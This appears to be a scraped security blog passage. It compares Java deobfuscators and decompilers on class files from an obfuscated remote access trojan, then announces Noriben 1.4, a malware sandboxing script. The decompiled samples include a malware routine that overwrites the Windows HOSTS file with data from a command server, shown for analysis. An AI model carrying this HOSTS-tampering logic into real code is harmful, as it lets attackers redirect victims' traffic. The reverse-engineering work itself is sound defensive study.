  • Zelix KlassMaster (ZKM)

JDO(Java DeObfuscator) is open-source Java, as well, and is provided as a .NET 2.0 executable. Unlike JMD, it will only operate against a Java Class file. This will require you to manually unzip a JAR file, then run JDO against each individual Class file. It will attempt to automatically detect and deobfuscate data through generic means.

Decompilers:
JD-GUI is probably the most widely used decompiler. It features a well-thought out GUI as well as the ability to parse entire JAR files. However, its current hosting site is unavailable, though the site is mirrored elsewhere. For updates, refer to the Twitter page of Emmanuel Dupuy.

The various forms of JD-GUI
For the purpose of this post, the latest version of JD-GUI was used. However, this version may be lacking the functionality of over versions of "JD". Recently, a greater deal of development has been performed by the JD-GUI developer on JD-Core / JD-IntelliJ.

JAD is a free decompiler, though one that has been discontinued for many years, and as such has many problems with newer iterations of the Java Development Kit (JDK). It's original web domain is gone, and the project is now hosted elsewhere. It's a basic, command-line tool that has been used as the backend to multiple other Java decompilers.

FernFlower was a free decompiler that appeared around 2009 and was unique for being a web-based decompiler. In 2011, an offline JAR file was made available, and the website taken down shortly after. It's currently used as the backend to many commercial decompilers, such as AndroChef and DJ Java Decompiler. Notably, it's currently available bundled in with the Minecraft Coder Pack.

Procyon is a recently released, open-source decompiler. It is currently in active development and, while a command-line tool, does have two GUI front-ends available: Luyten and SecureTeam's Decompiler. Procyon is available on Bitbucket.

Other decompilers that were not included in the scope of this post:
CFR
JReversePro
Krakatau - Python-based decompiler

Disassemblers:
As reversers know, decompilation is an immature science. Certain liberties are taken to assume and guess what code is doing in order to make readable source. The most accurate method is to simply view the raw data itself as compiled Java bytecode. For those situations, reJ provides an excellent GUI front end, and the ability to modify code on-the-fly.

Eclipse plugins
Some decompilers have the Eclipse IDE plugins available. Eclipse IDE is currently the prominent environment for Java development, and such plugins allow for code to be reversed directly into a new project for debugging and analysis.


Test 1: Simple file writing function.

The first test will be against an obfuscated class function that allows the RAT to save network-transmitted data to the local Windows HOSTS file to override DNS resolutions.

JD-GUI (raw class file)

importjava.io.FileWriter;

publicclassecextendsu
{
privatestaticfinalString[]z;

publicvoidb(StringparamString)
{
inti=c.db;Stringstr=s.b();
try{if(i!=0)breaklabel140;if(b.a()!=b.f)breaklabel128;}catch(ExceptionlocalException2){throwlocalException2;}
try{
FileWriterlocalFileWriter=newFileWriter(System.getenv(z[4])+z[2]);
localFileWriter.write(str);
localFileWriter.close();
s.b(z[1]);
s.b("");}catch(ExceptionlocalException1){
}try{
s.b(z[1]);
s.b(z[3]+localException1.getMessage());

if(i==0)return;
label128:s.b(z[1]);}catch(ExceptionlocalException3){throwlocalException3;}
label140:s.b(z[0]);
}

From this analysis, we have little to work off of. We see the java.io.FileWriter class in use, so we know that file activity is taking place, but all strings are replaced with array lookups of z[#]. Let's attempt this again after running the class file through an obfuscator.

JD-GUI (JDO Deobfuscated)

importjava.io.FileWriter;

publicclassClass_ecextendsu
{
privatestaticfinalString[]var_3a2;

publicvoidsub_3ed(StringparamString)
{
inti=c.db;Stringstr=s.b();
try{if(i!=0)breaklabel140;if(b.a()!=b.f)breaklabel128;}catch(ExceptionlocalException2){throwlocalException2;}
try{
FileWriterlocalFileWriter=newFileWriter(System.getenv(var_3a2[4])+var_3a2[2]);
localFileWriter.write(str);
localFileWriter.close();
s.b(var_3a2[1]);
s.b("");}catch(ExceptionlocalException1){
}try{
s.b(var_3a2[1]);
s.b(var_3a2[3]+localException1.getMessage());

if(i==0)return;
label128:s.b(var_3a2[1]);}catch(ExceptionlocalException3){throwlocalException3;}
label140:s.b(var_3a2[0]);
}

static
{
// Byte code:
// 0: iconst_5
// 1: anewarray 13 java/lang/String
// 4: dup
// 5: iconst_0
// 6: ldc 4
... Reduced for brevity ...
//   156: invokespecial 97 java/lang/String:<init> ([C)V
// 159: invokevirtual 100 java/lang/String:intern ()Ljava/lang/String;
// 162: swap
// 163: pop
// 164: swap
// 165: tableswitch default:+-152 -> 13, 0:+-143->22, 1:+-134->31, 2:+-125->40, 3:+-116->49
}
}

Well, that was awkward. JMD did attempt to rename the string array from 'z' to 'var_3a2', but its edits exposed ZKM's string decryption function. This function was unable to be decompiled by JD-GUI and appears as disassembled code. Oddly, this function was not seen by JD-GUI on the raw class file. But, nothing usable here. Similar results were found when using JDO with other decompilers, so further use in this post was stopped.

JD-GUI (JMD Deobfuscated)

importjava.io.FileWriter;

publicclassecextendsu
{
privatestaticfinalString[]z;

publicvoidb(Stringarg0)
{
Stringstr=s.b();
try{if(b.a()!=b.f)breaklabel111;}catch(ExceptionlocalException2){throwlocalException2;}
try{
FileWriterlocalFileWriter=newFileWriter(System.getenv("SystemDrive")+"\\Windows\\System32\\drivers\\etc\\hosts");
localFileWriter.write(str);
localFileWriter.close();
s.b("HOSTANSW");
s.b("");}catch(ExceptionlocalException1){
}try{
s.b("HOSTANSW");
s.b("ERR: "+localException1.getMessage());return;

label111:s.b("HOSTANSW");}catch(ExceptionlocalException3){throwlocalException3;}
s.b("Needs to be windows");
}
}

Well, our work here is done! Based on this display we see the Java code resolving the environment variable of SystemDrive (typically C:\Windows) and adding the hardcoded path to the HOSTS file. It writes a string that's returned from class 's' function 'b' (s.b()), a function responsible for network communications. The "HOSTANSW" strings are simply transmitted back to the C2, along with the "ERR: " message, if encountered.

In all, JD-GUI combined with JMD was able to give us a "full" analysis of this one class file. Let's try other decompilers.

Procyon (raw class file)

importjava.io.*;

publicclassecextendsu
{
privatestaticfinalString[]z;

publicvoidb(finalStrings){
finalintdb=c.db;
finalStringb=s.b();
Label_0140:{
Label_0128:{
try{
if(db!=0){
breakLabel_0140;
}
if(b.a()!=b.f){
breakLabel_0128;
}
}
catch(Exceptionex){
throwex;
}
try{
finalFileWriterfileWriter=newFileWriter(System.getenv(ec.z[4])+ec.z[2]);
fileWriter.write(b);
fileWriter.close();
s.b(ec.z[1]);
s.b("");
}
catch(ExceptionfileWriter){
s.b(ec.z[1]);
finalFileWriterfileWriter;
s.b(newStringBuilder(ec.z[3]).append(((Throwable)fileWriter).getMessage()).toString());
if(db==0){
return;
}
s.b(ec.z[1]);
s.b(ec.z[0]);
finalObjecto;
throwo;
}
}
}
}

static{
//
// This method could not be decompiled.
//
// Original Bytecode:
//
// 0: iconst_5
// 1: anewarray Ljava/lang/String;
// 4: dup
// 5: iconst_0
// 6: ldc "_8>f 1)4\" t},k u2,q"
... Reduced for brevity ...
//   165: tableswitch {
// 0: 22
// 1: 31
// 2: 40
// 3: 49
// default: 13
// }
// 196: return
//
// The error that occurred was:
//
// java.lang.IllegalStateException: Inconsistent stack size at #0053.
// at com.strobel.decompiler.ast.AstBuilder.performStackAnalysis(AstBuilder.java:1104)
... Reduced for brevity ...
thrownewIllegalStateException("An error occurred while decompiling this method.");
}
}

Interesting results there. Note that Procyon threw an exception at the end for an "Inconsistent stack size". Regardless, the code decompiled fine. It also recognized the ZKM string decryption routine but only provided the disassembled code for it. The decompiled code is almost identical to that provided by JD-GUI but is in a much more structured display. While JD-GUI attempts to group conditions together and compact the function borders ({}), Procyon gives a more formal output, albeit a larger one. Even its disassembled output is more structured, with liberal carriage returns.

Let's now run Procyon with a deobfuscated class file:

Procyon (JMD Deobfuscated)

importjava.io.*;

publicclassecextendsu
{
privatestaticfinalString[]z;

publicvoidb(finalStringarg0){
finalStringb=s.b();
Label_0111:{
try{
if(b.a()!=b.f){
breakLabel_0111;
}
}
catch(Exceptionex){
throwex;
}
try{
finalFileWriterfileWriter=newFileWriter(System.getenv("SystemDrive")+"\\Windows\\System32\\drivers\\etc\\hosts");
fileWriter.write(b);
fileWriter.close();
s.b("HOSTANSW");
s.b("");
return;
}
catch(ExceptionfileWriter){
s.b("HOSTANSW");
finalFileWriterfileWriter;
s.b("ERR: "+((Throwable)fileWriter).getMessage());
return;
}
try{
s.b("HOSTANSW");
}
catch(Exceptionex2){
throwex2;
}
}

s.b("Needs to be windows");
}
}

Similar to JD-GUI, we're able to get a clean decompiled analysis of the file. The two code produced between the two is nearly identical with the main difference being in the formal structure of the conditions.

JAD (raw class file)

JAD is commonly the backup to JD-GUI, but is a much outdated model for decompilation and disassembly. One of my favorite features about JAD, though, is that when it does fail to decompile, it's disassembly is a good mixture of the two. It disassembles, but attempts to put logic into the disassembly instead of just a blind dump like JD-GUI and Procyon:


importjava.io.FileWriter;

publicclassecextendsu
{

publicec()
{
}

publicvoidb(Strings1)
{
Strings2;
inti;
i=c.db;
s2=s.b();
try
{
label0:
{
if(i!=0)
breakMISSING_BLOCK_LABEL_140;
if(b.a()!=b.f)
breakMISSING_BLOCK_LABEL_128;
breaklabel0;
}
}
catch(Exception_ex){}
FileWriterfilewriter=newFileWriter((newStringBuilder(String.valueOf(System.getenv(z[4])))).append(z[2]).toString());
filewriter.write(s2);
filewriter.close();
s.b(z[1]);
s.b("");
breakMISSING_BLOCK_LABEL_148;
Exceptionexception;
exception;
s.b(z[1]);
s.b((newStringBuilder(z[3])).append(exception.getMessage()).toString());
if(i==0)
breakMISSING_BLOCK_LABEL_148;
s.b(z[1]);
breakMISSING_BLOCK_LABEL_140;
throw;
s.b(z[0]);
}

privatestaticfinalStringz[];

static
{
Stringas[]=newString[5];
as;
as;
0;
"_8>f\0071)4\"\026t},k\032u2,q";
-1;
goto_L1
_L7:
JVMINSTRaastore;
JVMINSTRdup;
true;
"Y\022\bV5_\016\f";
false;
goto_L1
_L8:
JVMINSTRaastore;
JVMINSTRdup;
2;
"M\n2l\020~*(^'h./g\031\"o\007f\006x+>p\007M8/a(y2(v\007";
true;
goto_L1
_L9:
JVMINSTRaastore;
JVMINSTRdup;
3;
"T\017\t8T";
2;
goto_L1
_L10:
JVMINSTRaastore;
JVMINSTRdup;
4;
"B$(v\021|\031)k\002t";
3;
goto_L1
... Reduced for brevity ...
JVMINSTRnew#13<ClassString>;
JVMINSTRdup_x1;
JVMINSTRswap;
String();
intern();
JVMINSTRswap;
JVMINSTRpop;
JVMINSTRswap;
JVMINSTRtableswitch03:default13
// 0 22
// 1 31
// 2 40
// 3 49;
goto_L7_L8_L9_L10_L11
}
}

JAD's decompiler does a fairly decent job, but differs on how it handles exception handling within the code. Let's see how it operates on deobfucated classes:

JAD (JMD Deobfuscated)


importjava.io.FileWriter;

publicclassecextendsu
{

publicec()
{
}

publicvoidb(Stringarg0)
{
Strings1;
s1=s.b();
try
{
label0:
{
if(b.a()!=b.f)
breakMISSING_BLOCK_LABEL_111;
breaklabel0;
}
}
catch(Exception_ex){}
FileWriterfilewriter=newFileWriter((newStringBuilder(String.valueOf(System.getenv("SystemDrive")))).append("\\Windows\\System32\\drivers\\etc\\hosts").toString());
filewriter.write(s1);
filewriter.close();
s.b("HOSTANSW");
s.b("");
breakMISSING_BLOCK_LABEL_129;
Exceptionexception;
exception;
s.b("HOSTANSW");
s.b((newStringBuilder("ERR: ")).append(exception.getMessage()).toString());
breakMISSING_BLOCK_LABEL_129;
s.b("HOSTANSW");
breakMISSING_BLOCK_LABEL_122;
throw;
s.b("Needs to be windows");
}

privatestaticfinalStringz[];

}

Here we see similar results as to what other tools found. But, as mentioned earlier, the exception handling is very confusing. There are breaks and exceptions inline with functional code. Later conditional sections, such as ensuring that the system is running on Microsoft Windows, are ignored and the code is shown as one series of instructions. All-in-all, it does give us some of the source code in a somewhat reasonable facsimile of the original. Excellent as a back-up tool if others fail, I wouldn't rely upon it for my analysis.

What about FernFlower?

FernFlower was a well known and trusted decompiler years ago. Like most decompilers, it fell off the scene silently. The first version was web-based, requiring you to upload your class files for analysis. Later versions were compiled. The FernFlower engine is currently used as the backend for commercial (shareware) products of DJ Decompiler and AndroChef. While competent tools that have built upon the capabilities of FernFlower, they are generally just commercial GUIs for the tool.

Additionally, FernFlower alone failed horribly in all of the tests here. Astonishingly, when confronted with the raw class file, it was unable to decompile or disassemble the main HOSTS writing function. However, it did decompile ZKM's string decryption routine, the exact opposite of what we need:


publicclassecextendsu{

privatestaticfinalString[]z;

publicvoidb(Stringparam1){
// $FF: Couldn't be decompiled
}

static{
String[]var10000=newString[5];
String[]var10001=var10000;
bytevar10002=0;
Stringvar10003="_8>f 1)4\" t},k u2,q";
bytevar10004=-1;

while(true){
char[]var5;
label38:{
char[]var2=var10003.toCharArray();
intvar10006=var2.length;
intvar0=0;
var5=var2;
intvar6=var10006;
if(var10006>1){
var5=var2;
var6=var10006;
if(var10006<=var0){
breaklabel38;
}
}

do{
char[]var8=var5;
intvar10007=var0;

while(true){
charvar10008=var8[var10007];
bytevar10009;
switch(var0%5){
case0:
var10009=17;
break;
case1:
var10009=93;
break;
case2:
var10009=91;
break;
case3:
var10009=2;
break;
default:
var10009=116;
}

var8[var10007]=(char)(var10008^var10009);
++var0;
if(var6!=0){
break;
}

var10007=var6;
var8=var5;
}
}while(var6>var0);
}

Stringvar4=(newString(var5)).intern();
switch(var10004){
case0:
var10001[var10002]=var4;
var10001=var10000;
var10002=2;
var10003="M\n2l ~*(^\'h./g \"o f x+>p M8/a(y2(v ";
var10004=1;
break;
case1:
var10001[var10002]=var4;
var10001=var10000;
var10002=3;
var10003="T \t8T";
var10004=2;
break;
case2:
var10001[var10002]=var4;
var10001=var10000;
var10002=4;
var10003="B$(v | )k t";
var10004=3;
break;
case3:
var10001[var10002]=var4;
z=var10000;
return;
default:
var10001[var10002]=var4;
var10001=var10000;
var10002=1;
var10003="Y \bV5_ \f";
var10004=0;
}
}
}
}


Test 2

The second test is against a very basic class file that performs one overall function, to delete a passed filename. One notable feature about this class file is that it contains no string table. That is one less layer to work around, but it still gave some issues.

JD-GUI (raw class file  /  JDO Deobfuscated  /  JMD Deobfuscated)

publicclassccextendsu
{
// ERROR //
publicvoidb(java.lang.StringparamString)
{
// Byte code:
// 0: getstatic 76 c:db I
// 3: istore 5
// 5: invokestatic 13 s:b ()Ljava/lang/String;
// 8: astore_2
// 9: invokestatic 13 s:b ()Ljava/lang/String;
// 12: astore_3
// 13: new 6 java/io/File
// 16: dup
// 17: new 8 java/lang/StringBuilder
... Reduced for brevity ...
// 93: athrow
// 94: aload 4// 96: getstatic 9 s:h Ljava/io/DataInputStream;// 99: aconst_null// 100: invokestatic 11 g:e ()[B// 103: invokestatic 12 p:b (Ljava/io/File;Ljava/io/DataInputStream;Lq;[B)V// 106: return//// Exception table:// from to target type// 46 59 62 re// 53 70 73 re// 63 80 83 re// 74 90 93 re}}

The first run of JD-GUI against this file produced identical results regardless of if a deobfuscator was used. That leads to the assumption that core obfuscation used by this malware is to simply rename functions and encode strings. However, it failed to decompile the code in any way, providing just basic disassembled code.

Procyon (raw class file  /  JDO Deobfuscated  /  JMD Deobfuscated)

importjava.io.*;

publicclassccextendsu
{
publicvoidb(finalStrings){
finalintdb=c.db;
finalStringb=s.b();
finalStringb2=s.b();
finalFilefile=newFile(b+File.separator+b2);
Filefile3=null;
Label_0096:{
Label_0094:{
try{
finalFilefile2=file3=file;
if(db!=0){
breakLabel_0096;
}
if(!file2.exists()){
breakLabel_0094;
}
}
catch(rere){
throwre;
}
finalFilefile4;
try{
file4=(file3=file);
if(db!=0){
breakLabel_0096;
}
}
catch(rere2){
throwre2;
}
try{
if(!file4.isFile()){
breakLabel_0094;
}
}
catch(rere3){
throwre3;
}
try{
file.delete();
}
catch(rere4){
throwre4;
}
}

file3=file;
}

p.b(file3,s.h,null,g.e());
}
}

Procyon provides ideal output. It shows the various exception catching taking place to ensure that the file exists, and is a file (not a folder or device), before calling for the deletion of it. The only issue is that the file object is copied into three other objects (file2, file3, file4) for exception catching purposes. Realistically, these would likely all be the same object.


JAD (raw class file  /  JDO Deobfuscated  /  JMD Deobfuscated)


importjava.io.File;

publicclassccextendsu
{

publiccc()
{
}

publicvoidb(Strings1)
{
Filefile;
inti;
i=c.db;
Strings2=s.b();
Strings3=s.b();
file=newFile((newStringBuilder(String.valueOf(s2))).append(File.separator).append(s3).toString());
file;
if(i!=0)goto_L2;elsegoto_L1
_L1:
exists();
JVMINSTRifeq94;
goto_L3_L4
throw;
_L3:
file;
if(i!=0)goto_L2;elsegoto_L5
throw;
_L5:
isFile();
JVMINSTRifeq94;
goto_L6_L4
throw;
_L6:
file.delete();
goto_L4
throw;
_L4:
file;
_L2:
s.h;
null;
g.e();
p.b();
}
}

Here, JAD slightly disappoints. It was unable to create decompiled code from the point of the first exception catch. Instead, it reverts to a mix of disassembled Java code and decompiled code. However, the class is still simple enough to understand the functionality from this view, though it's nowhere near as useable as Procyon.


What about Krakatau?
Krakatau was mentioned earlier, but not shown here. In my experience, Krakatau provides one of the best decompilation outputs, and is able to reverse a larger array of unusual code. In fact, for the first test, it is able to produce valid code for both the obfuscated routine and the string encoder. It is definitely notable of mention and use. However, I also had many issues with it working correctly. It would crash on most samples I gave it, though it would produce decompiled results. Most of this is due to minor issues: hardcoded checks for a file extension of ".jar", a Java path of JAVA_HOME\jre\lib\rt.jar, instead of the seen "jre7", etc. It may require small adjustments and an analytic eye to work cleanly in its current state, but it is definitely shaping up to become one of the better decompilers.

reJ (raw class file)

I can't just bring up reJ and not discuss it more in depth. reJ is my favorite Java tool for code manipulation, giving you a great deal of power over the code in its compiled form. It is a Java-based disassembler and hex editor for compiled Java class files. It provides granular inspection of the byte codes, string tables, and hardcoded values. It also allows for the direct editing, deletion, and addition of new byte code. It is only a disassembler, though, so its use requires extra knowledge of Java bytecode.

For a better analysis, I'd recommend toggling/enabling the following:
  • View -> Reference Translation -> Hybrid
  • View -> Split Mode -> Hex View
  • View -> Constant Pool

With some practice, you can work some magic with obfuscated Java code with reJ. By inserting print statements you could have the program display all of its decoded/operational values during run time. However, this does require that you manually manage the stack pointers, which is not for the faint of reversing.


Closing Statements

The one takeaway from all of this is that there is, still, no clear-cut best decompiler. Up until this year, it was a losing battle of abandoned products against ever-changing obfuscators and Java implementations. The recent introduction of Procyon, CFP, Krakatau has introduced much-needed new blood into the field. While their results are still not perfect, the hope is that within the next year or two they should surpass JD-GUI and JAD.

For now, though, analysis still requires that a reverser run multiple decompilers against their sample to determine the actual functionality. My current flow has always been to run JD-GUI first, then JAD. However, I've been swayed towards Procyon, accompanied by its new GUIs, to easily churn through hundreds of classes and JAR files, making it my current first-run analysis tool. Krakatau is also included, but it's not yet a tool I would give to a junior analyst.

I'm very excited to see what will come about with these products next year when they've had a chance to mature.


Noriben version 1.4 released

$
0
0
It's been a few months since the last official release of Noriben. The interim time has been filled with a few ninja-edits of updated filters, and wondering what to put in next.

Noriben started out as a simple wrapper to Sysinternals procmon to automatically gather all of the runtime details for malware analysis within a VM. It then filters out all the unnecessary system details until what's left is a fairly concise view of what the malware did to the system while running. It is a great alternative to a dedicated sandbox environment. More details on Noriben can be found here.

Over the months I was ecstatic to hear of organizations using Noriben in various roles. Many had modified the script to use it as an automated sandbox to run alongside their commercial products, which was exactly one of my goals for the script. However, the current requirement of manual interaction was an issue and I saw many ugly hacks of how people bypassed it. The new version should take care of that issue.
This was originally a release for version 1.3, which I pushed up on Friday. However, I received quite a bit of feedback for other new features and so quickly I pushed up version 1.4.

In the new version 1.4, I've introduced a few new features:

  • A non-interactive mode that runs for a specified number of seconds on malware that is specified from the command line
  • The ability to generalize strings, using Windows environment variables
  • The ability to specify an output directory
Non-Interactive Mode
The non-interactive mode was needed for a long time, and I apologize it took some time to implement it, as it was a very easy addition. It can be set in one of two ways:
The beginning of the source has a new line:

timeout_seconds = 0

By setting this to a value other than zero, Noriben will automatically wait that number of seconds to monitor the file system. This can be hardcoded for automated implementations, such as in a sandbox environment.

This value can also be overridden with a command line option of --timeout (-t). When using this argument, Noriben will enable the timeout mode and use the specified number of seconds. This is useful if you have a particularly long runtime sample. Even if Noriben.py was modified to have a 120-second timeout, you can override this on the command line with a much greater value (3600 seconds, for example).

Noriben now also lets you note the malware from the command line, making it completely non-interactive:

Noriben.py --cmd "C:\malware\bad.exe www.badhost.com 80" --timeout 300

This command line will launch bad.exe, with a given command line, for a period of 5 minutes. At such time, Noriben will stop monitoring the malware, but it will continue to run.

Output Directory
An alternate output directory can be specified on the command line with --output. If this folder does not exist, it will be created. If Noriben is unable to create the directory, such as when it doesn't have access (e.g. C:\Windows\System32\), then it will give an error and quit.


String Generalization
One requested feature was to replace the file system paths with the Windows environment variables, to make them generic. Many people copy and paste their Noriben results which may show system-specific values, such as "C:\Documents and Settings\Bob\malware.exe". This string will be generalized to "%UserProfile%\malware.exe".

This feature is turned off by default, but can be enabled by changing a setting in the file:

generalize_paths = False

Or by setting --generalize on the command line.


All in all, these features could be summed up with:

Noriben.py --output C:\Logs\Malware --timeout 300 --generalize --cmd "C:\Malware\evil.exe"

Download Noriben
Viewing all 52 articles
Browse latest View live